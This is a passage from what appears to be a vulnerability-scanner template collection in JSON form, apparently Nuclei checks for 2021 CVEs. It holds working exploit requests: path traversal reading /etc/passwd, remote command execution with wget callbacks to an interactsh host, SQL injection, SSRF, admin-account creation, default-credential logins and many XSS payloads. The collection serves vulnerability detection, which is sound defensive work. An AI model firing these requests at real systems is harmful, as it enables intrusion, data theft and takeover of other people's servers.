Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../","{{BaseURL}}/log/view?filename=/windows/win.ini&base=../../../../../../../../../../","{{BaseURL}}/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../","{{BaseURL}}/log/view?filename=/etc/passwd&base=../../../../../../../../../../"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-38702","info":{"name":"Cyberoam NetGenie Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44451","info":{"name":"Apache Superset <=1.3.2 - Default Login","severity":"medium"},"requests":[{"raw":["GET /login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf_token={{csrf_token}}&username={{username}}&password={{password}}\n","GET /dashboard/list/ HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"username":["admin"],"password":["admin"]},"attack":"pitchfork","cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["session"]},{"type":"word","part":"body_3","words":["DashboardFilterStateRestApi"]}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["name=\"csrf_token\" type=\"hidden\" value=\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-25052","info":{"name":"WordPress Button Generator <2.3.3 - Remote File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=wow-company&tab=http://{{interactsh-url}}/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","name":"http","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46424","info":{"name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete","severity":"critical"},"requests":[{"raw":["GET /images/icons_title.gif HTTP/1.1\nHost: {{Hostname}}\n","DELETE /images/icons_title.gif HTTP/1.1\nHost: {{Hostname}}\n","GET /images/icons_title.gif HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 200 && status_code_2 == 204 && status_code_3 == 404"]}]}]},{"id":"CVE-2021-32819","info":{"name":"Nodejs Squirrelly - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Wget"]}]}]},{"id":"CVE-2021-41773","info":{"name":"Apache 2.4.49 - Path Traversal and Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\necho Content-Type: text/plain; echo; {{cmd}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","name":"RCE","words":["CVE-2021-41773-POC"]},{"type":"regex","name":"LFI","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-46387","info":{"name":"Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Forms/rpAuth_1?id=</form><iMg%20src=x%20onerror=\"prompt(document.domain)\"><form>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<iMg src=x onerror=\"prompt(document.domain)\"><form>","Entry Error"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43734","info":{"name":"kkFileview v4.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/getCorsFile?urlPath=file:///etc/passwd","{{BaseURL}}/getCorsFile?urlPath=file:///c://windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26723","info":{"name":"Jenzabar 9.2x-9.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27330","info":{"name":"Triconsole Datepicker Calendar <3.77 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/calendar/calendar_form.php/\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","<title>TriConsole.com - PHP Calendar Date Picker</title>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24291","info":{"name":"WordPress Photo Gallery by 10Web <1.5.69 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1\"%20onmouseover=alert(document.domain)//"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["onmouseover=alert(document.domain)//","wp-content/uploads/photo-gallery"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39501","info":{"name":"EyouCMS 1.5.4 Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2021-46005","info":{"name":"Sourcecodester Car Rental Management System 1.0 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nusername={{username}}&password={{password}}&login=\n","POST /admin/post-avehical.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarypWqYipqU21aYgccv\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"vehicletitle\"\n\nTest\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"brandname\"\n\n1\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"vehicalorcview\"\n\n</script><script>alert(document.domain)</script>\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"priceperday\"\n\n500\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"fueltype\"\n\nPetrol\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"modelyear\"\n\n2022\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"seatingcapacity\"\n\n5\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img1\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img2\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img3\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img4\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img5\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"submit\"\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv--\n","GET / HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22005","info":{"name":"VMware vCenter Server - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\ntest_data\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","status_code_2 == 201","contains(body_1, 'VMware vSphere')","content_length_2 == 0"],"condition":"and"}]}]},{"id":"CVE-2021-28150","info":{"name":"Hongdian H8922 3.0.5 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /backup2.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\n","GET /backup2.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"word","part":"body","words":["CLI configuration saved from vty","service webadmin"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24436","info":{"name":"WordPress W3 Total Cache <2.1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=w3tc_extensions&extension=\"%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, '><script>alert(document.domain)</script>&action=view')","contains(header_2, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2021-26702","info":{"name":"EPrints 3.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi/dataset_dictionary?dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34621","info":{"name":"WordPress ProfilePress  3.0.0-3.1.3 - Admin User Creation Weakness","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_username\"\n\n{{randstr}}\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_email\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_password\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_password_present\"\n\ntrue\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_first_name\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_last_name\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"_wp_http_referer\"\n\n/wp/?page_id=18\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"pp_current_url\"\n\n{{BaseURL}}\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"wp_capabilities[administrator]\"\n\n1\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"signup_form_id\"\n\n1\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"signup_referrer_page\"\n\n\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"action\"\n\npp_ajax_signup\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"melange_id\"\n\n\n-----------------------------138742543134772812001999326589--\n","POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\nlog={{randstr}}@interact.sh&pwd={{randstr}}@interact.sh&wp-submit=Log+In\n","GET /wp-admin/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nConnection: close\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Welcome to your WordPress Dashboard"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42063","info":{"name":"SAP Knowledge Warehouse <=7.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/SAPIrExtHelp/random/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<SVG ONLOAD=&#97&#108&#101&#114&#116(&#X64&#X6F&#X63&#X75&#X6D&#X65&#X6E&#X74&#X2E&#X64&#X6F&#X6D&#X61&#X69&#X6E)>","SAPIKS2"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41649","info":{"name":"PuneethReddyHC Online Shopping System homeaction.php SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/homeaction.php"],"body":"cat_id=4'&get_seleted_Category=1","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["Warning: mysqli_num_rows() expects parameter 1 to be","xdebug-error xe-warning"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25120","info":{"name":"Easy Social Feed < 6.2.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type=</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'type' : '</script><script>alert(document.domain)</script>'"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43574","info":{"name":"Atmail 6.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/atmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/atmail/webmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>\" does not exist"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500,403],"condition":"or"}]}]},{"id":"CVE-2021-31682","info":{"name":"WebCTRL OEM <= 6.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>","common/lvl5"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26598","info":{"name":"ImpressCMS <1.4.3 - Incorrect Authorization","severity":"medium"},"requests":[{"raw":["GET /misc.php?action=showpopups&type=friend HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36\n","GET /include/findusers.php?token={{token}} HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["last_login","user_regdate","uname"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["REQUEST' value='(.*?)'","REQUEST\" value=\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2021-24940","info":{"name":"WordPress Persian Woocommerce <=5.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=persian-wc&s=xxxxx%22+accesskey%3DX+onclick%3Dalert%281%29+test%3D%22 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_2, \"text/html\")","status_code_2 == 200","contains(body_2, 'accesskey=X onclick=alert(1) test=')","contains(body_2, 'woocommerce_persian_translate')"],"condition":"and"}]}]},{"id":"CVE-2021-41460","info":{"name":"ECShop 4.1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /delete_cart_goods.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=1||(updatexml(1,concat(0x7e,(select%20md5({{num}}))),1))\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22054","info":{"name":"VMWare Workspace ONE UEM - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A"],"matchers-condition":"and","matchers":[{"type":"word","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24666","info":{"name":"WordPress Podlove Podcast Publisher <3.5.6 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["66a82937a7660b73b00d4f7cefee6c85","\"service_id\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25296","info":{"name":"Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&ip_address=127.0.0.1&domain=127.0.0.1&username=username&password=password&plugin_output_len=9999%3bwget%20{{interactsh-url}}%3b HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body_4","words":["Event Log","Display Name"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true,"part":"body"},{"type":"regex","name":"nsp_auth","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-25099","info":{"name":"WordPress GiveWP <2.17.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=give_checkout_login&form_id=xxxxxx\"><script>alert(document.domain)</script>\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")","contains(body, \"give_user_login\")"],"condition":"and"}]}]},{"id":"CVE-2021-28149","info":{"name":"Hongdian H8922 3.0.5 Devices - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /log_download.cgi?type=../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nCache-Control: max-age=0\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\n","GET /log_download.cgi?type=../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","sshd:[x*]","root:[$]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21087","info":{"name":"Adobe ColdFusion - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cf_scripts/scripts/ajax/package/cfajax.js","{{BaseURL}}/cf-scripts/scripts/ajax/package/cfajax.js","{{BaseURL}}/CFIDE/scripts/ajax/package/cfajax.js","{{BaseURL}}/cfide/scripts/ajax/package/cfajax.js","{{BaseURL}}/CF_SFSD/scripts/ajax/package/cfajax.js","{{BaseURL}}/cfide-scripts/ajax/package/cfajax.js","{{BaseURL}}/cfmx/CFIDE/scripts/ajax/package/cfajax.js"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["eval\\(\\\"\\(\\\"\\+json\\+\\\"\\)\\\"\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44139","info":{"name":"Alibaba Sentinel - Server-side request forgery (SSRF)","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/registry/machine?app={{rand_base(5)}}&appType=0&version=0&hostname={{rand_base(5)}}&ip={{interactsh-url}}&port=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"success\":true","\"msg\":\"success\""],"condition":"and"}]}]},{"id":"CVE-2021-32820","info":{"name":"Express-handlebars - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?layout=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","daemon:[x*]:0:0:","operator:[x*]:0:0:"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24358","info":{"name":"Plus Addons for Elementor Page Builder < 4.1.10 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-login.php?action=theplusrp&key=&redirecturl=http://interact.sh&forgoturl=http://interact.sh&login={{username}} HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?<span(?:[A-Za-z0-9 -\\_=\"]+)?>([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"},{"type":"regex","name":"username","group":1,"regex":["ion: https:\\/\\/[a-z0-9.]+\\/author\\/([a-z]+)\\/"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-26855","info":{"name":"Microsoft Exchange Server SSRF Vulnerability","severity":"critical"},"requests":[{"raw":["GET /owa/auth/x.js HTTP/1.1\nHost: {{Hostname}}\nCookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3;\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-24300","info":{"name":"WordPress WooCommerce <1.13.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword=\"onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\\\"onmouseover=alert(document.domain);//\">","PickPlugins Product Slider"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24991","info":{"name":"WooCommerce PDF Invoices & Packing Slips WordPress Plugin < 2.10.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=wpo_wcpdf_options_page&section=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\" style=animation-name:rotation onanimationstart=alert(document.domain) x","WooCommerce PDF Invoices"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-1497","info":{"name":"Cisco HyperFlex HX Data Platform - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /auth/change HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password={{url_encode(payload)}}\n","POST /auth HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password={{url_encode(payload)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-25065","info":{"name":"Smash Balloon Social Post Feed < 4.1.1 - Authenticated Reflected Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=cff-top&cff_access_token=xox%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert(document.domain)%3E&cff_final_response=true HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<img src onerror=alert(document.domain)>\")","contains(body_2, 